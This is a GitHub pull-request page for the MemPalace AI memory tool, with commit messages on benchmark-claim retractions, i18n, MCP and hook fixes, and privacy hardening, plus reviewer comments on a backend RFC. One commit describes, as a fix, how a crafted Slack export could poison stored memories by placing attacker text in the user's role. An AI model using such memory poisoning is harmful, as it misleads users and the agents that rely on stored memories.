 - 2026-04-11 impostor-domain notice (moved from README header)
 - 2026-04-07 "A Note from Milla & Ben" (moved from README body)

README keeps a one-line scam-alert callout that links to
docs/HISTORY.md for the full timeline.

* docs(website): align mempalaceofficial.com with honest benchmarks

Part of #875. Bring the VitePress site into line with the new README
and the reproducibility scorecard: drop category-error comparisons,
drop retracted claims, retain only metrics and caveats that survive
audit.

website/index.md
 - New tagline matches README (local-first, verbatim, pluggable backend,
   96.6% R@5 raw, zero API calls).
 - Replace the "MemPalace hybrid 100% / Supermemory ~99% / Mastra
   94.87% / Mem0 ~85%" comparison table with a single honest table
   showing MemPalace's own retrieval-recall numbers (raw 96.6%,
   hybrid v4 held-out 98.4%). Add an explicit sentence explaining why
   we no longer publish a cross-system table on the landing page
   (retrieval recall vs QA accuracy are different metrics).
 - Soften the "ChromaDB-powered vector search" feature blurb to be
   backend-agnostic, since the retrieval layer is pluggable.

website/reference/benchmarks.md
 - Full rewrite of the retrieval-recall tables. No more "100%"
   headline; honest held-out 98.4% R@5 replaces it. Added the
   model-agnostic rerank result (99.2% R@5 / 100% R@10 with
   minimax-m2.7 via Ollama) to show the pipeline is not Haiku-specific.
 - Drop the LoCoMo "Hybrid v5 + Sonnet rerank (top-50) 100%" row.
   With per-conversation session counts of 19-32 and top_k=50, the
   retrieval stage returns every session by construction — the number
   measures an LLM's reading comprehension, not retrieval.
 - Drop the cross-system comparison tables. Link out to each project's
   own research page (Mastra, Mem0, Supermemory) for their published
   numbers and metric definitions.
 - Rewrite reproduction commands to use the correct repository and
   demonstrate the new --llm-backend ollama flag.

website/concepts/the-palace.md
 - Remove the "+34%" row / paragraph. Wing/room filtering is standard
   metadata filtering in the vector store, not a novel retrieval
   mechanism — the April-7 note already retracted that framing; this
   finishes the retraction on the website where it had remained.

website/guide/searching.md
 - Same treatment for "34% retrieval improvement". Reframe as
   operational scoping, not a novel boost.

website/reference/contributing.md
 - Update the "palace structure matters" bullet to reflect the same
   framing: scoping-not-magic.

website/concepts/knowledge-graph.md
 - Replace the MemPalace-vs-Zep feature matrix with a short "related
   work" note that links to Zep's own documentation for authoritative
   details on their deployment model. Avoids claims we cannot verify
   at source.

* docs: #875 follow-up — repo surfaces + reproduction URLs + CHANGELOG

Remaining in-repo surfaces carrying the same retracted or broken
claims as the public pages fixed in the previous two commits.

CONTRIBUTING.md
 - "Palace structure matters ... 34% retrieval improvement" → reframed
   as scoping (same rewording applied to the website equivalents).

benchmarks/BENCHMARKS.md
 - Add a prominent "Important caveat" block at the top of the
   "Comparison vs Published Systems" table explaining that R@5
   (retrieval recall) and QA accuracy are different metrics, with
   citations to Mastra, Mem0, and Supermemory's own published
   methodology pages. Annotate the specific competitor rows whose
   numbers are QA accuracy, not retrieval recall.
 - Annotate the `hybrid v4 + rerank 100%` row to note that the 99.4
   → 100 step was tuned on 3 specific wrong answers (already disclosed
   further down in the doc under "Benchmark Integrity"); the honest
   hybrid figure is held-out 98.4%.
 - Fix the broken clone URL — `aya-thekeeper/mempal` no longer points
   at anything; now `MemPalace/mempalace`.

benchmarks/README.md + benchmarks/HYBRID_MODE.md
 - Same clone-URL fix applied.

CHANGELOG.md
 - Add a ### Documentation entry under [Unreleased] v3.3.0 that names
   #875 and summarises the scope of the rewrite.

* docs+tests: fix CI after README slim (#875)

The regression-guard tests added in #835 were pinned to the old
README shape (tool table + file-reference table). When #897 slimmed
the README and moved that content to the website, three tests
started failing:

  TestReadmeToolsExistInCode.test_every_readme_tool_exists_in_tools_dict
  TestNoUnlistedTools.test_no_undocumented_tools
  TestReadmeDialectNotLossless.test_readme_dialect_line_not_lossless

Changes in this commit:

1. Update the 3 tests to track the new canonical docs surfaces
   - Tool list -> website/reference/mcp-tools.md
     (tests parse `### \`mempalace_xxx\`` headings instead of
     markdown table rows).
   - dialect.py lossless disclaimer -> website/reference/modules.md
     (any line mentioning dialect.py must not also say "lossless").

2. Fix the website to make "no undocumented tools" true
   Add the 10 tools that existed in TOOLS but were missing from
   website/reference/mcp-tools.md (create_tunnel, delete_tunnel,
   follow_tunnels, list_tunnels, get_drawer, list_drawers,
   update_drawer, hook_settings, memories_filed_away, reconnect).
   Page header now correctly says "all 29 MCP tools".

3. Align pre-commit ruff pin to match CI (0.4.x)
   .pre-commit-config.yaml was pinning ruff v0.9.0, while
   .github/workflows/ci.yml installs ruff>=0.4.0,<0.5. The two
   formatters produce incompatible output (e.g. v0.9.0 reformats
   `assert (x), msg` -> `assert x, (msg)` in a way v0.4.x rejects),
   which would cause the pre-commit hook to modify files that CI
   then flags as unformatted. Pinning the hook to v0.4.10 keeps
   the dev loop and CI in lock-step.

Full suite: 887 passed, 0 failed.

* fix: address i18n review issues from PR #718

Three issues flagged by bensig on the i18n PR before merge:

1. ko.json: status_drawers used {drawers} instead of {count}, causing
   the Korean UI to show the raw template string instead of the actual
   drawer count.  All other 7 languages use {count}.

2. Test file was shipped inside the package at mempalace/i18n/test_i18n.py
   with a sys.path.insert hack.  Moved to tests/test_i18n.py per the
   project convention in AGENTS.md.

3. Dialect.from_config() passed lang=config.get("lang") which defaults
   to None, causing __init__ to inherit whatever language was loaded
   earlier via module-level state.  Now defaults to "en" explicitly so
   from_config is deterministic regardless of prior load_lang() calls.

Added two regression tests for the ko.json fix and the state leak.

* docs(cli): clarify that 'mempalace init' requires <dir> (#210) (#862)

Fixes #210.

The CLI requires a positional <dir> argument. Previous docs emphasized
that init 'sets up ~/.mempalace/' which misled users into expecting
no arguments. Now the docs show <dir> is required, offer '.' as the
usage for the current directory, and reword the description so the
project-directory scan is listed first.

* fix: make entity_registry.research() local-only by default (#811)

* fix: make entity_registry.research() local-only by default

research() previously called _wikipedia_lookup() unconditionally,
sending entity names to en.wikipedia.org on every uncached lookup.
This violates the project's local-first and privacy-by-architecture
principles documented in CLAUDE.md.

Changes:
- research() now returns "unknown" for uncached words by default
- New allow_network=True parameter required for Wikipedia lookups
- Wikipedia 404 now returns "unknown" instead of asserting "person"
  with 0.70 confidence, preventing entity registry poisoning
- Added privacy warning docstring to _wikipedia_lookup()
- Added tests for local-only default, opt-in network, 404 handling,
  and cache-not-persisted-on-local-only behaviour

Refs: MemPalace/mempalace#809

* fix: improve research() cache read path and deduplicate test mocks

- Use .get() instead of .setdefault() for cache reads in research()
  so the local-only path never mutates _data unnecessarily
- Move .setdefault() to the network-write path only
- Use result.setdefault() for word/confirmed keys to ensure
  consistent return shape across all _wikipedia_lookup error paths
- Extract duplicated mock_result dict into _MOCK_SAOIRSE_PERSON
  constant shared by 3 test functions

* fix: return empty status instead of error on cold-start palace (#830) (#831)

tool_status() called _get_collection() with the default create=False,
which throws when the ChromaDB collection does not exist yet (valid
palace, zero drawers). The exception was swallowed and status returned
"No palace found" even though init had completed successfully.

Switching to create=True bootstraps an empty collection on first
status call, matching what the write path already does.

Fix suggested by @hkevinchu in the issue.

* fix(searcher): guard against empty ChromaDB query results (#195) (#865)

Fixes #195.

When ChromaDB returns no documents (empty palace, or wing/room filter
that excludes everything), it returns the shape:

    {"documents": [], "metadatas": [], "distances": []}

Indexing `results["documents"][0]` blindly raises IndexError instead of
the expected 'no results' response. Affected: searcher.search(),
searcher.search_memories() (drawer + closet branches plus the
total_before_filter aggregate), and Layer3.search() / Layer3.search_raw().

Adds a tiny private helper `searcher._first_or_empty(results, key)` that
safely extracts the inner list, returning [] for any of: missing key,
empty outer list, [None], or [[]]. layers.py imports the same helper to
avoid duplicating the guard.

Tests: tests/test_empty_chromadb_results.py covers all observed shapes
plus a documentation-style test that pins the original IndexError so
future readers understand why the helper exists.

* fix(init): auto-add per-project files to .gitignore in git repos (#185) (#866)

Partially addresses #185.

`mempalace init <dir>` writes `mempalace.yaml` and `entities.json` into
the project root. When <dir> is a git repository, those files have no
default protection and risk being committed by accident — the loudest
concern in the original report.

This PR adds `_ensure_mempalace_files_gitignored()` which runs at the
end of cmd_init: if <dir>/.git exists, append the two filenames to
.gitignore (creating it if necessary) under a clearly-marked block.

The helper is conservative:
- only runs when <dir>/.git is present (no-op for non-git projects)
- skips entries already present (no duplicates)
- preserves existing .gitignore content
- handles files without trailing newlines

This does NOT relocate the files to ~/.mempalace/wings/<wing>/ as the
issue's 'Expected' section proposes — that's a behavioral change with
miner/config implications and warrants a separate design discussion.
The gitignore safeguard removes the immediate risk without breaking any
existing flow.

Tests: 5 cases in tests/test_init_gitignore_protection.py covering
no-op, fresh creation, partial append, idempotency, and missing-newline
edge case.

* fix(mcp): redirect stdout to stderr during import to protect JSON-RPC channel (#225) (#864)

* fix(mcp): redirect stdout to stderr during import to protect JSON-RPC channel (#225)

Fixes #225.

Several transitive dependencies (chromadb, onnxruntime, posthog) print
banners and warnings to stdout — sometimes at the C level — during the
mcp_server import chain. Because the MCP protocol multiplexes JSON-RPC
over stdio, any non-JSON output on stdout corrupted the message stream
and broke Claude Desktop's parser with errors like:

  MCP mempalace: Unexpected token '*', "**********"... is not valid JSON
  MCP mempalace: Unexpected token 'E', "EP Error D"... is not valid JSON
  MCP mempalace: Unexpected token 'F', "Falling ba"... is not valid JSON

Reproduced on Windows 11 with mempalace 3.0.0 / Python 3.10 / Claude
Desktop 1.1062.0.

Fix: at module load, redirect stdout to stderr at both the Python level
(sys.stdout = sys.stderr) and the file-descriptor level (os.dup2(2, 1))
to catch C-level prints, while preserving the real stdout for later
restore. main() calls _restore_stdout() right before entering the
protocol loop so JSON-RPC responses still go to the real stdout.

Adds tests/test_mcp_stdio_protection.py with three regression tests:
- module-level redirect is in place after import
- _restore_stdout() restores the original stdout (idempotent)
- 'python -m mempalace.mcp_server' with empty stdin emits no stdout

* style: reformat with ruff 0.4 (CI version) for #225

* fix(hooks): stop precompact hook from blocking compaction (#856, #858) (#863)

* fix(hooks): stop precompact hook from blocking compaction

The precompact hook unconditionally returned {"decision": "block"},
which in Claude Code means "cancel compaction" with no retry mechanism.
This made /compact permanently broken for all plugin users.

Changed hook_precompact() to mine the transcript synchronously (so data
lands before compaction) and return {"decision": "allow"}. This matches
the standalone bash hook in hooks/ which already uses allow.

Also extracted _get_mine_dir() and _mine_sync() helpers so precompact
can mine from the transcript directory, not just MEMPAL_DIR.

Stop hook behavior is unchanged -- left for #673 which implements the
full silent save path.

Closes #856, closes #858.

* fix: use empty JSON instead of invalid \"allow\" decision value

Claude Code only recognizes \"block\" as a top-level decision value.
\"allow\" is a permissionDecision value for PreToolUse hooks, not a
valid top-level decision. The correct way to not block is to return
empty JSON. Caught by #872.

* feat: include created_at timestamp in search results (#846)

* feat: include created_at timestamp in search results (closes #465)

Surface the existing filed_at metadata as created_at in search result
objects returned by search_memories(). Enables temporal reasoning over
search hits without additional queries.

* Feat: add fallback for missing filed_at metadata

* fix: add provenance header and speaker IDs to Slack transcript imports (#815)

* fix: add provenance header and speaker IDs to Slack transcript imports

Slack exports are multi-party chats where no speaker is inherently
the "user" or "assistant". The parser previously assigned these roles
purely by position, allowing a crafted export to place attacker text
in the "user" role — making it appear as the memory owner's words
in all future retrieval (data poisoning via stored memory).

Changes:
- Add provenance header marking Slack transcripts as multi-party
  with positional (unverified) role assignment
- Prefix each message with the original speaker ID ([U1], [U2], etc.)
  so downstream consumers can distinguish authors
- Keep user/assistant role alternation for exchange-pair chunking
  compatibility with convo_miner.py

Tests:
- Provenance header presence and content
- Speaker ID preservation in output
- Attacker-first-message attribution verification

Refs: MemPalace/mempalace#809

* fix: move Slack provenance to footer, sanitize speaker IDs, extract constant

- Move provenance notice from header to footer to prevent it becoming
  a standalone ChromaDB drawer via paragraph chunking on exports
  with fewer than 3 exchange pairs (violates verbatim-always principle)
- Sanitize speaker user_id/username: strip brackets, newlines, and
  control characters to prevent chunk-boundary injection via crafted
  Slack exports
- Extract header string to _SLACK_PROVENANCE_FOOTER module constant,
  consistent with _TOOL_RESULT_* constants pattern; tests import it
  instead of duplicating the literal

Refs: MemPalace/mempalace#809

* fix: restrict file permissions on sensitive palace data (#814)

* fix: restrict file permissions on sensitive palace data

On Linux with default umask (022), several files and directories
containing personal data were created world-readable. This patch
applies chmod 0o700 to directories and 0o600 to files immediately
after creation, wrapped in try/except for Windows compatibility.

Files hardened:
- hooks_cli.py: hook_state/ directory and hook.log
- entity_registry.py: entity_registry.json (names, relationships)
- knowledge_graph.py: knowledge_graph.sqlite3 parent directory
- exporter.py: export output directory and wing subdirectories
- config.py: people_map.json (name mappings)
- mcp_server.py: WAL file creation uses atomic os.open (TOCTOU fix)

Refs: MemPalace/mempalace#809

* fix: avoid redundant chmod calls on hot paths

- hooks_cli.py: chmod STATE_DIR and hook.log only on first creation,
  not on every _log() call (hooks fire on every Stop event)
- exporter.py: track created wing dirs to skip redundant makedirs +
  chmod on the same directory across batches
- mcp_server.py: remove redundant _WAL_FILE.chmod after os.open
  already set mode=0o600 atomically

Refs: MemPalace/mempalace#809

* test: add palace_graph tunnel helper coverage

Adds focused tests for explicit tunnel helpers in `mempalace/palace_graph.py`.

Covered:
- `_load_tunnels`
- `_save_tunnels`
- `create_tunnel`
- `list_tunnels`
- `delete_tunnel`
- `follow_tunnels`

* refactor(entity_detector): make multi-language extensible via i18n JSON

Move all entity-detection lexical patterns (person verbs, pronouns,
dialogue markers, project verbs, stopwords, candidate character class)
out of hardcoded module-level constants and into the entity section of
each locale's JSON in mempalace/i18n/. Adds a languages parameter to
every public function so callers union patterns across the desired
locales. The default stays ("en",), so all existing callers and tests
behave unchanged.

Also adds:
- get_entity_patterns(langs) helper in mempalace/i18n/ that merges
  patterns across requested languages, dedupes lists, unions stopwords,
  and falls back to English for unknown locales
- MempalaceConfig.entity_languages property + setter, with env var
  override (MEMPALACE_ENTITY_LANGUAGES, comma-separated)
- mempalace init --lang en,pt-br flag (persists to config.json)
- Per-language candidate_pattern so non-Latin scripts (Cyrillic,
  Devanagari, CJK) can register their own character classes instead of
  being silently dropped by the ASCII-only [A-Z][a-z]+ default
- _build_patterns LRU cache keyed by (name, languages) so multi-language
  callers don't poison each other's cache slots

Why now: the open language PRs (#760 ru, #773 hi, #778 id, #907 it) only
add CLI strings via mempalace/i18n/. PR #156 (pt-br) is the first that
needed entity_detector changes and inlined a _PTBR variant of every
constant. That doesn't scale past 2-3 languages — every text gets
checked against every language's patterns regardless of relevance, and
candidate extraction still drops accented and non-Latin names.

This PR sets the standard so future locale contributors only edit one
JSON file (no Python changes), and entity detection scales linearly
with how many languages a user actually enabled, not how many ship.

* test: document orphan-locale recovery for _temp_locale helper

* feat: add Russian language support to i18n module

Add ru.json with full Russian translations for CLI strings, palace
terminology, AAAK compression instruction, and regex patterns for
topic/action extraction with Cyrillic character classes.

No code changes needed -- the i18n module auto-discovers language
files via *.json glob in the i18n directory.

* feat(i18n): add entity detection section to Russian locale

Cyrillic candidate/multi-word patterns, person-verb patterns
(сказал, спросил, ответил, etc.), pronoun patterns, dialogue
markers, direct address, and Russian stopwords.

Follows the i18n entity framework from #911.

* fix(i18n): apply review feedback on ru.json (#760)

- mine_skip: "повторной раскопки" -> "повторной обработки"
- quote_pattern: add Russian guillemet quotes «»

Co-Authored-By: almirus <almirus@users.noreply.github.com>

* feat(i18n): expand Russian entity stopwords with prepositions and conjunctions

Adds 34 prepositions and conjunctions to reduce false positives
in entity detection when these words appear sentence-initial.

Co-Authored-By: almirus <almirus@users.noreply.github.com>

* feat: add italian i18n support

* feat: add italian entity patterns

* Updated hi.json to support infra for entity,pronoun_patterns,dialogue_patterns,direct_address_pattern, project_verb_patterns and stopwords

* feat(i18n): add Brazilian Portuguese locale with entity detection (closes #117)

CLI strings, AAAK instruction, regex patterns, and entity section
with person-verb, pronoun, dialogue, and candidate patterns for
Latin+diacritics names (Joao, Ines, Angela).

Follows the i18n entity framework from #911.

* fix(i18n): address review feedback on pt-br.json

- dialogue_patterns[0]: remove stray \" before > (fixes markdown quote matching)
- entity stopwords: add 40 prepositions, conjunctions, and common words to reduce false positives
- pronoun_patterns: add 2nd-person (você/vocês) and possessives (seu/sua/seus/suas)

* feat(cli): add version display and version flag to CLI

Introduces a version label to the command-line interface, displaying the current MemPalace version in the help text. Adds a `--version` flag to allow users to easily check the version and exit.

* fix(i18n): resolve language codes case-insensitively (#927)

BCP 47 language tags are case-insensitive (RFC 5646 §2.1.1) but the
locale files mix conventions (pt-br.json vs zh-CN.json). On
case-sensitive filesystems, '--lang PT-BR' or '--lang zh-cn' silently
missed the file, _load_entity_section returned {}, and entity
detection ran in English with no warning.

The cache key in get_entity_patterns was built from raw input, so
('PT-BR',) and ('pt-br',) produced two distinct entries, both wrong.

Add _canonical_lang(lang) that resolves any casing to the on-disk
filename stem via lowercase comparison, and route load_lang,
_load_entity_section, and the cache key through it.

Closes #927

* fix(i18n): use Optional[str] for Python 3.9 compatibility

PEP 604 union syntax (str | None) requires Python 3.10+. The project
supports 3.9 per CI matrix, so use typing.Optional instead.

* fix(entity_detector): script-aware word boundaries for combining-mark scripts

Python's \b is a \w/non-\w transition. Devanagari vowel signs (matras)
like ा ी ु are Unicode category Mc (Mark, Spacing Combining) — not \w.
This means \b splits mid-word on every matra: names like अनीता (Anita)
truncate to अनीत, and person-verb patterns like \bराज\s+ने\s+कहा\b
never match because \b fails after the final matra of कहा.

Same issue affects Arabic, Hebrew, Thai, Tamil, and every other script
whose words contain combining marks.

Fix: locales with combining-mark scripts declare a boundary_chars field
in their entity section (e.g. "\\w\\u0900-\\u097F" for Hindi). The i18n
loader replaces every \b in that locale's patterns with a script-aware
lookaround that treats the declared characters as "inside-word", and
pre-wraps candidate/multi_word patterns with the same boundary.

Default behavior (no boundary_chars) keeps standard \b — en, pt-br, ru,
it are unchanged.

Changes:
- mempalace/i18n/__init__…
Copy link
Copy Markdown
Collaborator

@jphein jphein left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Follow-up review after the 2026-04-13 round + @bensig's approval. Most of my earlier concerns are addressed; one new empirical observation worth flagging.

Closed from my prior review

  • §1.5 read-heavy edge case (palace stays unknown indefinitely if it rarely writes) — closed by the explicit mempalace palace set-embedder --model NAME CLI in the three-state table at line 192. Operators of read-heavy palaces have a path that doesn't require waiting for a stale write to trigger identity resolution. ✓

  • §7.4 UUID5 namespace — bensig's block is still mechanical (placeholder TO-BE-ASSIGNED-ONCE-FOR-ALL-TIME); no opinion from this side on the value, just confirming it's the only remaining gate.

Still open from my prior review (no new info needed, just a note)

  • §1.3 typed-results migration — RFC currently doesn't sketch a .to_dict() compat shim on QueryResult / GetResult. Forks and downstream consumers with code touching mcp_server.py or searcher.py that assume dict returns will need real edits, not no-op wrappers. The cleanup PR mentioned in §10 is the right place to land it; just naming the question now so it isn't a surprise during that PR's review.

New: per-palace multi-collection isn't in the spec

The fork shipped a structural fix this week that's adjacent to RFC 001 in an interesting way. Cat 9 A/B benchmark on a 151K-drawer canonical palace surfaced that Stop-hook auto-save checkpoints (short, query-term-saturated) dominate vector top-N — kind=all returned 632 tokens/Q of mostly-checkpoint word-soup; kind=content (post-filter) returned 3 because over-fetch=100 wasn't enough. Recall was 0.984 R@5; E2E quality collapsed.

The fix promoted the architecture from "filter at query time" to "split at storage time": move checkpoints to a dedicated mempalace_session_recovery ChromaDB collection (same client, same palace, separate index), with a new mempalace_session_recovery_read MCP tool reading by session_id / agent / since-until. Implementation: palace.py gained _SESSION_RECOVERY_COLLECTION + get_session_recovery_collection(palace_path) mirroring get_collection(palace_path, collection_name="mempalace_drawers", create=...). Palace-daemon's lifespan runs migrate_checkpoints_to_recovery() on startup so existing palaces auto-migrate.

This works on the current BaseBackend / BaseCollection API — get_collection(palace, collection_name=...) is already keyed by collection_name, so adding a sibling collection per palace is just calling it with a different name. The design fell out of the existing seam.

Question for the spec: is "multiple collections per palace, by purpose" intentionally implicit in the API, or worth one sentence in §2.5 / §3.1? Reading the RFC, "palace" feels like the unit (1:1 with a collection); but production needed >1 collection per palace for the verbatim-vs-derivative split. Backends like Postgres (#665) and Qdrant (#700) handle this trivially via schema/collection naming, but a future backend that assumes 1:1 — or a backend author reading the spec — might design themselves into a corner. A "backends MUST support N collections per palace, keyed by collection_name arg" line would close the gap without changing any signatures.

(Spec at §1.6 calls out "many palaces" but not "many collections per palace." Adjacent but distinct.)

Rest of the spec

Read clean. §10's flagging of mcp_server._get_client() cache + reconnect for migration-into-ChromaBackend is exactly right — that #757 work is Chroma-specific and shouldn't live in mcp_server. §11's PR-impact table accurately reflects the in-flight backends; nothing missing from this side.

Net: ready to merge after UUID5 and (if desired) the multi-collection sentence.

@cschnatz
Copy link
Copy Markdown

Following up on Q1 from my 2026-04-15 comment — re-stating concretely now that approval is close, since this is the one item I'd like pinned in the spec rather than left to implementations.

We treat PalaceRef.namespace as a mandatory isolation boundary at the contract level. A backend that accepts a write under PalaceRef(namespace="tenant_A") and later returns those records for a read under PalaceRef(namespace="tenant_B") is, for us, a critical defect — not a caller misconfiguration. Auth/authz (which team_ids a sidecar may query) stays on the deployment side. But cross-namespace bleed within a single backend instance has to be a spec violation, not implementation choice.

§4.4 currently reads as naming-only ("the backend uses it as given"). Suggest one MUST clause:

Backends MUST scope all reads, writes, and deletes by PalaceRef.namespace. A record written under one namespace MUST NOT be returned, modified, or deleted by an operation issued under a different namespace within the same backend instance. Cross-namespace access is a spec violation.

Without this, hosted multi-tenant deployments can't cite RFC 001 as the basis for tenant isolation, and the contract becomes unenforceable across plugins from different authors.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

area/install pip/uv/pipx/plugin install and packaging documentation Improvements or additions to documentation storage

Projects

None yet

Development

Successfully merging this pull request may close these issues.

7 participants